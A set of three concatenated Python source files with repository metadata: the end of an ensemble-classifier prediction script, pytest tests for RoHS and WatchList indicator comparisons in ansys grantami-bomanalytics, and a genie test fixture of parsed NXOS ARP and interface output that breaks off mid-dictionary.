'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'imputation:strategy': 'mean',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.89271865035',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '9.0',
'random_forest:min_samples_split': '2.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '58.6633457276',
'select_percentile_classification:score_func': 'chi2'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '1299.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '4.38103060363',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '3.0',
'random_forest:min_samples_split': '2.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '1653.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.58731902957',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '8.0',
'random_forest:min_samples_split': '19.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
]
# Build one classifier per (weight, configuration) pair, fit it on the
# training data, and collect weighted class-probability predictions for the
# validation and test sets.  Relies on `weights`, `configurations`, `X`,
# `y`, `X_valid`, `X_test`, `ParamSklearnClassifier`, `np`, `os`, `output`
# and `dataset` being defined earlier in the file.
classifiers = []
predictions_valid = []
predictions_test = []
# Make predictions and weight them
for weight, configuration in zip(weights, configurations):
    # Hyperparameter values were serialized as strings; coerce each one
    # back to int first, then float, leaving it untouched if neither fits.
    # ValueError/TypeError are the only errors these conversions raise, so
    # catch them specifically instead of a blanket Exception.
    for param in configuration:
        try:
            configuration[param] = int(configuration[param])
        except (ValueError, TypeError):
            try:
                configuration[param] = float(configuration[param])
            except (ValueError, TypeError):
                pass
    classifier = ParamSklearnClassifier(configuration, 1)
    classifiers.append(classifier)
    try:
        classifier.fit(X.copy(), y.copy())
        predictions_valid.append(
            classifier.predict_proba(X_valid.copy()) * weight)
        predictions_test.append(
            classifier.predict_proba(X_test.copy()) * weight)
    except Exception as e:
        # Best-effort ensemble: a single failing configuration must not
        # abort the run; report it and continue with the others.
        # (Parenthesized print is valid in both Python 2 and 3.)
        print(e)
        print(configuration)
# Output the predictions: sum the weighted probabilities, keep the
# positive-class column, and write one file per split.
for name, predictions in [('valid', predictions_valid),
                          ('test', predictions_test)]:
    predictions = np.array(predictions)
    predictions = np.sum(predictions, axis=0)
    predictions = predictions[:, 1].reshape((-1, 1))
    filepath = os.path.join(output, '%s_%s_000.predict' % (dataset, name))
    np.savetxt(filepath, predictions, delimiter=' ')
f5a17d53bbb1e7a65b5dbd0ec18944078fe899ff | 17,597 | py | Python | tests/test_bom_indicators.py | pyansys/grantami-bomanalytics | b9e4956b0a1cdd67d50953caa8257b6cff34a243 | [
"MIT"
] | 2 | 2022-02-18T19:53:20.000Z | 2022-02-18T21:35:27.000Z | tests/test_bom_indicators.py | pyansys/grantami-bomanalytics | b9e4956b0a1cdd67d50953caa8257b6cff34a243 | [
"MIT"
] | 46 | 2022-02-18T16:57:36.000Z | 2022-03-31T13:35:26.000Z | tests/test_bom_indicators.py | pyansys/grantami-bomanalytics | b9e4956b0a1cdd67d50953caa8257b6cff34a243 | [
"MIT"
] | 1 | 2022-02-22T18:24:03.000Z | 2022-02-22T18:24:03.000Z | import pytest
import random
from ansys.grantami.bomanalytics import indicators
from ansys.grantami.bomanalytics_openapi import CommonIndicatorDefinition
def create_rohs_indicator(ignore_exemptions) -> indicators.RoHSIndicator:
    """Build a RoHS indicator using the shared test definition values."""
    return create_indicator(
        indicators.RoHSIndicator,
        ignore_exemptions=ignore_exemptions,
    )
def create_watchlist_indicator(ignore_process_chemicals) -> indicators.WatchListIndicator:
    """Build a watch-list indicator using the shared test definition values."""
    return create_indicator(
        indicators.WatchListIndicator,
        ignore_process_chemicals=ignore_process_chemicals,
    )
def create_indicator(indicator, **kwargs) -> indicators._Indicator:
    """Instantiate *indicator* with the common test definition plus *kwargs*."""
    defaults = {
        "name": "TestIndicator",
        "legislation_names": ["Test legislation 1, Test legislation 2"],
        "default_threshold_percentage": 5,
    }
    # Duplicate keywords between defaults and kwargs raise TypeError at the
    # call, matching the behavior of passing them as explicit keywords.
    return indicator(**defaults, **kwargs)
def get_random_flag(flag_enum):
    """Return a member strictly between the lowest and highest flags.

    Picks a random enum value in [2, len(flag_enum) - 1], so the result is
    never the lowest (value 1) or the highest (value len) member.
    """
    upper = len(flag_enum) - 1
    return flag_enum(random.randint(2, upper))
def get_high_flag(flag_enum):
    """Return the highest flag: the member whose value equals the enum's size."""
    member_count = len(flag_enum)
    return flag_enum(member_count)
def get_low_flag(flag_enum):
    """Return the lowest flag: the member with value 1."""
    lowest_value = 1
    return flag_enum(lowest_value)
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestFlagComparison:
    """Ordering, equality and identity semantics of the flag enums."""

    def test_flag_greater_than(self, indicator):
        top = get_high_flag(indicator.available_flags)
        mid = get_random_flag(indicator.available_flags)
        bottom = get_low_flag(indicator.available_flags)
        assert top > mid
        assert mid > bottom

    def test_flag_greater_than_equal_to(self, indicator):
        chosen = get_random_flag(indicator.available_flags)
        assert chosen >= chosen
        assert chosen >= get_low_flag(indicator.available_flags)

    def test_flag_less_than(self, indicator):
        top = get_high_flag(indicator.available_flags)
        mid = get_random_flag(indicator.available_flags)
        bottom = get_low_flag(indicator.available_flags)
        assert bottom < mid
        assert mid < top

    def test_flag_less_than_equal_to(self, indicator):
        chosen = get_random_flag(indicator.available_flags)
        assert chosen <= chosen
        assert chosen <= get_high_flag(indicator.available_flags)

    def test_flag_equal(self, indicator):
        chosen = get_random_flag(indicator.available_flags)
        assert chosen == chosen
        assert not chosen != chosen

    def test_flag_identity(self, indicator):
        chosen = get_random_flag(indicator.available_flags)
        assert chosen is chosen
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestIndicators:
    """Flag assignment errors plus str()/repr() rendering of indicators."""

    def test_indicator_unknown_flag_key_error(self, indicator):
        ind = create_indicator(indicator)
        with pytest.raises(KeyError) as e:
            ind.flag = "Invalid Flag"
        message = str(e.value)
        assert 'Unknown flag "Invalid Flag"' in message
        assert repr(ind) in message

    def test_indicator_str_with_flag(self, indicator):
        ind = create_indicator(indicator)
        ind.flag = get_random_flag(ind.available_flags).name
        assert str(ind) == f"{ind.name}, {ind.flag.name}"

    def test_indicator_str_without_flag(self, indicator):
        ind = create_indicator(indicator)
        assert str(ind) == ind.name

    def test_indicator_repr_with_flag(self, indicator):
        ind = create_indicator(indicator)
        ind.flag = get_random_flag(ind.available_flags).name
        expected = f"<{indicator.__name__}, name: {ind.name}, flag: {ind.flag}>"
        assert repr(ind) == expected

    def test_indicator_repr_without_flag(self, indicator):
        ind = create_indicator(indicator)
        assert repr(ind) == f"<{indicator.__name__}, name: {ind.name}>"
class TestRohsIndicator:
    """Definition attributes and REST serialization of a RoHS indicator."""

    test_indicator = create_rohs_indicator(ignore_exemptions=True)

    def test_indicator_definition(self):
        ind = self.test_indicator
        assert ind.name == "TestIndicator"
        assert ind.legislation_names == ["Test legislation 1, Test legislation 2"]
        assert ind.default_threshold_percentage == 5
        assert ind._indicator_type == "Rohs"
        assert ind._ignore_exemptions is True
        assert ind.available_flags
        assert not ind.flag

    def test_indicator_definition_property(self):
        definition = self.test_indicator._definition
        assert isinstance(definition, CommonIndicatorDefinition)
        as_dict = definition.to_dict()
        assert as_dict["name"] == self.test_indicator.name
        assert as_dict["legislation_names"] == self.test_indicator.legislation_names
        assert as_dict["default_threshold_percentage"] == self.test_indicator.default_threshold_percentage
        assert as_dict["type"] == self.test_indicator._indicator_type
        assert as_dict["ignore_exemptions"] == self.test_indicator._ignore_exemptions
        # The watch-list-only option must stay unset on a RoHS indicator.
        assert as_dict["ignore_process_chemicals"] is None
class TestWatchListIndicator:
    """Definition attributes and REST serialization of a watch-list indicator."""

    test_indicator = create_watchlist_indicator(ignore_process_chemicals=True)

    def test_indicator_definition(self):
        ind = self.test_indicator
        assert ind.name == "TestIndicator"
        assert ind.legislation_names == ["Test legislation 1, Test legislation 2"]
        assert ind.default_threshold_percentage == 5
        assert ind._indicator_type == "WatchList"
        assert ind._ignore_process_chemicals is True
        assert ind.available_flags
        assert not ind.flag

    def test_indicator_definition_property(self):
        definition = self.test_indicator._definition
        assert isinstance(definition, CommonIndicatorDefinition)
        as_dict = definition.to_dict()
        assert as_dict["name"] == self.test_indicator.name
        assert as_dict["legislation_names"] == self.test_indicator.legislation_names
        assert as_dict["default_threshold_percentage"] == self.test_indicator.default_threshold_percentage
        assert as_dict["type"] == self.test_indicator._indicator_type
        # The RoHS-only option must stay unset on a watch-list indicator.
        assert as_dict["ignore_exemptions"] is None
        assert as_dict["ignore_process_chemicals"] == self.test_indicator._ignore_process_chemicals
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestIndicatorComparison:
    """Rich comparisons between two indicator instances of the same type."""

    @staticmethod
    def _with_flag(indicator, picker):
        # Build an indicator and assign the flag chosen by *picker*.
        ind = create_indicator(indicator)
        ind.flag = picker(ind.available_flags).name
        return ind

    @pytest.mark.parametrize("add_flag", [True, False])
    def test_definition_comparison_value_error(self, indicator, add_flag):
        # Comparing against an indicator with no flag set must raise,
        # regardless of whether the left-hand side has a flag.
        left = create_indicator(indicator)
        if add_flag:
            left.flag = get_random_flag(left.available_flags).name
        right = create_indicator(indicator)
        with pytest.raises(ValueError) as e:
            _ = left == right
        assert left.name in str(e.value)
        assert "has no flag" in str(e.value)
        with pytest.raises(ValueError) as e:
            _ = left < right
        assert left.name in str(e.value)
        assert "has no flag" in str(e.value)

    def test_less_than(self, indicator):
        reference = self._with_flag(indicator, get_random_flag)
        lower = self._with_flag(indicator, get_low_flag)
        assert lower < reference
        assert not lower >= reference

    def test_greater_than(self, indicator):
        reference = self._with_flag(indicator, get_random_flag)
        higher = self._with_flag(indicator, get_high_flag)
        assert higher > reference
        assert not higher <= reference

    def test_equal_to(self, indicator):
        reference = self._with_flag(indicator, get_random_flag)
        twin = create_indicator(indicator)
        twin.flag = reference.flag.name
        assert twin == reference
        assert not twin != reference

    def test_not_equal_to(self, indicator):
        higher = self._with_flag(indicator, get_high_flag)
        lower = self._with_flag(indicator, get_low_flag)
        assert higher != lower
        assert not higher == lower

    def test_less_than_equal_to(self, indicator):
        reference = self._with_flag(indicator, get_random_flag)
        twin = create_indicator(indicator)
        twin.flag = reference.flag.name
        lower = self._with_flag(indicator, get_low_flag)
        assert twin <= reference
        assert lower <= reference
        assert not twin > reference
        assert not lower > reference

    def test_greater_than_equal_to(self, indicator):
        reference = self._with_flag(indicator, get_random_flag)
        twin = create_indicator(indicator)
        twin.flag = reference.flag.name
        higher = self._with_flag(indicator, get_high_flag)
        assert twin >= reference
        assert higher >= reference
        assert not twin < reference
        assert not higher < reference
@pytest.mark.parametrize(
    "indicator, other_indicator",
    [
        (indicators.RoHSIndicator, indicators.WatchListIndicator),
        (indicators.WatchListIndicator, indicators.RoHSIndicator),
    ],
)
def test_indicator_result_different_indicators_type_error(indicator, other_indicator):
    """Comparing indicators of different concrete types raises TypeError."""
    first = create_indicator(indicator)
    first.flag = get_random_flag(first.available_flags).name
    second = create_indicator(other_indicator)
    second.flag = get_random_flag(second.available_flags).name
    with pytest.raises(TypeError) as e:
        _ = second == first
    assert str(indicator) in str(e.value)
    assert str(other_indicator) in str(e.value)
    with pytest.raises(TypeError) as e:
        _ = second < first
    assert str(indicator) in str(e.value)
    assert str(other_indicator) in str(e.value)
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestCompareFlagWithIndicator:
    """Comparisons with a flag on the left and an indicator on the right.

    Cleaned up: the original ``test_less_than_equal_to`` and
    ``test_greater_than_equal_to`` built an extra indicator
    (``low_indicator``/``high_indicator``) that was never used in any
    assertion; those dead locals are removed here.
    """

    def test_compare_with_definition_value_error(self, indicator):
        # Comparing a flag against an indicator with no flag set must raise.
        flagged = create_indicator(indicator)
        flagged.flag = get_random_flag(flagged.available_flags).name
        unflagged = create_indicator(indicator)
        with pytest.raises(ValueError) as e:
            _ = flagged.flag == unflagged
        assert flagged.name in str(e.value)
        assert "has no flag" in str(e.value)
        with pytest.raises(ValueError) as e:
            _ = flagged.flag < unflagged
        assert flagged.name in str(e.value)
        assert "has no flag" in str(e.value)

    def test_less_than(self, indicator):
        ind = create_indicator(indicator)
        ind.flag = get_random_flag(ind.available_flags).name
        low = get_low_flag(ind.available_flags)
        assert low < ind
        assert not low >= ind

    def test_greater_than(self, indicator):
        ind = create_indicator(indicator)
        ind.flag = get_random_flag(ind.available_flags).name
        high = get_high_flag(ind.available_flags)
        assert high > ind
        assert not high <= ind

    def test_equal_to(self, indicator):
        ind = create_indicator(indicator)
        ind.flag = get_random_flag(ind.available_flags).name
        assert ind.flag == ind
        assert not ind.flag != ind

    def test_not_equal_to(self, indicator):
        low_ind = create_indicator(indicator)
        low_ind.flag = get_low_flag(low_ind.available_flags).name
        high = get_high_flag(low_ind.available_flags)
        assert high != low_ind
        assert not high == low_ind

    def test_less_than_equal_to(self, indicator):
        ind = create_indicator(indicator)
        ind.flag = get_random_flag(ind.available_flags).name
        low = get_low_flag(ind.available_flags)
        assert ind.flag <= ind
        assert low <= ind
        assert not ind.flag > ind
        assert not low > ind

    def test_greater_than_equal_to(self, indicator):
        ind = create_indicator(indicator)
        ind.flag = get_random_flag(ind.available_flags).name
        high = get_high_flag(ind.available_flags)
        assert ind.flag >= ind
        assert high >= ind
        assert not ind.flag < ind
        assert not high < ind
@pytest.mark.parametrize("indicator", [indicators.RoHSIndicator, indicators.WatchListIndicator])
class TestCompareIndicatorWithFlag:
    """Comparisons with an indicator on the left and a flag on the right."""

    @staticmethod
    def _with_flag(indicator, picker):
        # Build an indicator and assign the flag chosen by *picker*.
        ind = create_indicator(indicator)
        ind.flag = picker(ind.available_flags).name
        return ind

    def test_compare_with_definition_value_error(self, indicator):
        # An indicator with no flag set cannot be compared against a flag.
        flagged = self._with_flag(indicator, get_random_flag)
        unflagged = create_indicator(indicator)
        with pytest.raises(ValueError) as e:
            _ = unflagged == flagged.flag
        assert flagged.name in str(e.value)
        assert "has no flag" in str(e.value)
        with pytest.raises(ValueError) as e:
            _ = unflagged < flagged.flag
        assert flagged.name in str(e.value)
        assert "has no flag" in str(e.value)

    def test_less_than(self, indicator):
        low = self._with_flag(indicator, get_low_flag)
        assert low < get_random_flag(low.available_flags)
        assert not low >= get_random_flag(low.available_flags)

    def test_greater_than(self, indicator):
        high = self._with_flag(indicator, get_high_flag)
        assert high > get_random_flag(high.available_flags)
        assert not high <= get_random_flag(high.available_flags)

    def test_equal_to(self, indicator):
        ind = self._with_flag(indicator, get_random_flag)
        assert ind == ind.flag
        assert not ind != ind.flag

    def test_not_equal_to(self, indicator):
        low = self._with_flag(indicator, get_low_flag)
        assert low != get_high_flag(low.available_flags)
        assert not low == get_high_flag(low.available_flags)

    def test_less_than_equal_to(self, indicator):
        ind = self._with_flag(indicator, get_random_flag)
        low = create_indicator(indicator)
        low.flag = get_low_flag(ind.available_flags).name
        assert ind <= ind.flag
        assert low <= ind.flag
        assert not ind > ind.flag
        assert not low > ind.flag

    def test_greater_than_equal_to(self, indicator):
        ind = self._with_flag(indicator, get_random_flag)
        high = create_indicator(indicator)
        high.flag = get_high_flag(ind.available_flags).name
        assert ind >= ind.flag
        assert high >= ind.flag
        assert not ind < ind.flag
        assert not high < ind.flag
| 43.449383 | 109 | 0.745013 | 2,120 | 17,597 | 5.818396 | 0.047642 | 0.214998 | 0.123064 | 0.112363 | 0.889015 | 0.854155 | 0.813458 | 0.800243 | 0.78638 | 0.715444 | 0 | 0.000834 | 0.182133 | 17,597 | 404 | 110 | 43.556931 | 0.85624 | 0 | 0 | 0.52459 | 0 | 0 | 0.042564 | 0.016651 | 0 | 0 | 0 | 0 | 0.344262 | 1 | 0.140984 | false | 0 | 0.013115 | 0.016393 | 0.203279 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1971a5acb8a048bf8d785850c122ed80b1174205 | 35,807 | py | Python | pkgs/ops-pkg/src/genie/libs/ops/arp/nxos/tests/arp_output.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/ops-pkg/src/genie/libs/ops/arp/nxos/tests/arp_output.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/ops-pkg/src/genie/libs/ops/arp/nxos/tests/arp_output.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | '''
Arp Genie Ops Object Outputs for NXOS.
'''
class ArpOutput(object):
ShowIpArpDetailVrfAll = {
'interfaces': {
'Ethernet1/1': {
'ipv4': {
'neighbors': {
'10.1.3.5': {
'age': '-',
'ip': '10.1.3.5',
'link_layer_address': 'aaaa.bbbb.cccc',
'origin': 'static',
'physical_interface': 'Ethernet1/1'}
}
}
},
'Ethernet1/1.1': {
'ipv4': {
'neighbors': {
'192.168.4.2': {
'age': '00:01:53',
'ip': '192.168.4.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/1.1'}
}
}
},
'Ethernet1/1.2': {
'ipv4': {
'neighbors': {
'192.168.154.2': {
'age': '00:00:47',
'ip': '192.168.154.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/1.2'}
}
}
},
'Ethernet1/1.4': {
'ipv4': {
'neighbors': {
'192.168.106.2': {
'age': '00:08:42',
'ip': '192.168.106.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/1.4'}
}
}
},
'Ethernet1/2.1': {
'ipv4': {
'neighbors': {
'192.168.154.2': {
'age': '00:18:24',
'ip': '192.168.154.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/2.1'}
}
}
},
'Ethernet1/2.2': {
'ipv4': {
'neighbors': {
'192.168.51.2': {
'age': '00:05:21',
'ip': '192.168.51.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/2.2'}
}
}
},
'Ethernet1/2.4': {
'ipv4': {
'neighbors': {
'192.168.9.2': {
'age': '00:10:51',
'ip': '192.168.9.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/2.4'}
}
}
},
'Ethernet1/4.100': {
'ipv4': {
'neighbors': {
'10.51.1.101': {
'age': '00:01:28',
'ip': '10.51.1.101',
'link_layer_address': '0000.71c7.6e61',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/4.100'}
}
}
},
'Ethernet1/4.101': {
'ipv4': {
'neighbors': {
'10.154.1.101': {
'age': '00:01:28',
'ip': '10.154.1.101',
'link_layer_address': '0000.71c7.75c1',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/4.101'}
}
}
},
'Ethernet1/4.200': {
'ipv4': {
'neighbors': {
'10.76.1.101': {
'age': '00:01:28',
'ip': '10.76.1.101',
'link_layer_address': '0000.0068.ce6f',
'origin': 'dynamic',
'physical_interface': 'Ethernet1/4.200'}
}
}
},
'mgmt0': {
'ipv4': {
'neighbors': {
'10.1.7.1': {
'age': '00:17:15',
'ip': '10.1.7.1',
'link_layer_address': '0012.7f57.ac80',
'origin': 'dynamic',
'physical_interface': 'mgmt0'},
'10.1.7.250': {
'age': '00:14:24',
'ip': '10.1.7.250',
'link_layer_address': '0050.5682.7915',
'origin': 'dynamic',
'physical_interface': 'mgmt0'},
'10.1.7.253': {
'age': '00:10:22',
'ip': '10.1.7.253',
'link_layer_address': '0050.56a4.a9fc',
'origin': 'dynamic',
'physical_interface': 'mgmt0'}
}
}
}
}
}
ShowIpArpSummaryVrfAll = {
'incomplete': 0,
'throttled': 0,
'resolved': 12,
'total': 12,
'unknown': 0}
ShowIpArpstatisticsVrfAll = {
'statistics': {
'adjacency': {
'adjacency_adds': 43,
'adjacency_deletes': 12,
'adjacency_timeouts': 12,
'failed_due_to_limits': 0},
'received': {
'anycast_proxy_arp': 0,
'dropped': 28218,
'dropped_server_port': 0,
'drops_details': {
'appeared_on_a_wrong_interface': 0,
'arp_refresh_requests_received_from_clients': 0,
'context_not_created': 0,
'directed_broadcast_source': 0,
'dropping_due_to_tunneling_failures': 0,
'glean_requests_recv_count': 71,
'grat_arp_received_on_proxy': 0,
'incorrect_length': 0,
'invalid_context': 0,
'invalid_destination_ip_address': 0,
'invalid_hardwaretype': 0,
'invalid_layer2_address_length': 0,
'invalid_layer3_address_length': 0,
'invalid_protocol_packet': 0,
'invalid_source_ip_address': 28,
'invalid_source_mac_address': 0,
'l2_packet_on_untrusted_l2_port': 0,
'l2fm_query_failed_for_a_l2address': 0,
'no_mem_to_create_per_intf_structure': 0,
'non_active_fhrp_dest_ip': 0,
'non_local_destination_ip_address': 20421,
'number_of_signals_received_from_l2rib': 0,
'packet_with_vip_on_standby_fhrp': 0,
'received_before_arp_initialization': 0,
'requests_came_for_exising_entries': 15,
'requests_came_on_a_l2_interface': 0,
'source_address_mismatch_with_subnet': 0,
'source_mac_address_is_our_own': 0},
'enhanced_proxy_arp': 0,
'fastpath': 0,
'l2_port_track_proxy_arp': 0,
'l2_replies': 0,
'l2_requests': 0,
'local_proxy_arp': 0,
'proxy_arp': 0,
'replies': 6582,
'requests': 22632,
'snooped': 0,
'total': 0,
'tunneled': 0},
'sent': {
'dropped': 0,
'drops_details': {
'adjacency_couldnt_be_added': 0,
'arp_refresh_skipped_over_core_and_flooded': 0,
'client_enqueue_failed': 0,
'context_not_created': 0,
'dest_not_reachable_for_proxy_arp': 0,
'dest_unreachable_for_enhanced_proxy': 0,
'destnination_is_our_own_ip': 26,
'destnination_on_l2_port_tracked': 0,
'invalid_context': 0,
'invalid_dest_ip': 0,
'invalid_ifindex': 0,
'invalid_local_proxy_arp': 0,
'invalid_proxy_arp': 0,
'invalid_src_ip': 0,
'mbuf_operation_failed': 0,
'null_source_ip': 0,
'null_source_mac': 0,
'unattached_ip': 0,
'vip_is_not_active': 0},
'gratuitous': 58,
'l2_replies': 0,
'l2_requests': 0,
'replies': 998,
'requests': 2102,
'total': 3158,
'tunneled': 0}
}
}
ShowIpInterfaceVrfAll = {
"Ethernet2/11": {
"icmp_port_unreachable": "enabled",
"multicast_groups_address": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-down/link-down/admin-down",
"load_sharing": "none",
"ipv4": {
"counters": {
"multicast_bytes_received": 0,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 0,
"unicast_bytes_sent": 0,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 0,
"multicast_packets_sent": 0,
"unicast_bytes_consumed": 0,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 0,
"multicast_bytes_originated": 0,
"multicast_packets_received": 0,
"multicast_packets_consumed": 0,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 0,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 0,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 0,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 0,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 0,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 0
},
"10.64.4.4/24": {
"ip": "10.64.4.4",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"secondary": False,
"ip_subnet": "10.64.4.0"
},
"unnumbered": {
"interface_ref": "loopback0"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 46,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"wccp_redirect_exclude": "disabled"
},
"loopback0": {
"icmp_port_unreachable": "enabled",
"multicast_groups_address": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-up/link-up/admin-up",
"load_sharing": "none",
"ipv4": {
"counters": {
"multicast_bytes_received": 0,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 0,
"unicast_bytes_sent": 0,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 0,
"multicast_packets_sent": 0,
"unicast_bytes_consumed": 5612014,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 0,
"multicast_bytes_originated": 0,
"multicast_packets_received": 0,
"multicast_packets_consumed": 0,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 92391,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 0,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 0,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 0,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 0,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 0
},
"10.64.4.4/24": {
"route_preference": "0",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"ip_subnet": "10.64.4.0",
"ip": "10.64.4.4",
"secondary": False,
"route_tag": "0"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 180,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"wccp_redirect_exclude": "disabled"
},
"Ethernet2/1": {
"icmp_port_unreachable": "enabled",
"load_sharing": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-up/link-up/admin-up",
"ipv4": {
"counters": {
"multicast_bytes_received": 13421700,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 17167084,
"unicast_bytes_sent": 9499793,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 13421700,
"multicast_packets_sent": 208673,
"unicast_bytes_consumed": 2804558,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 208673,
"multicast_bytes_originated": 17167084,
"multicast_packets_received": 208601,
"multicast_packets_consumed": 417202,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 46150,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 53942,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 2803426,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 46139,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 53942,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 9499793
},
"10.3.4.4/24": {
"route_preference": "0",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"ip_subnet": "10.3.4.0",
"ip": "10.3.4.4",
"secondary": False,
"route_tag": "0"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
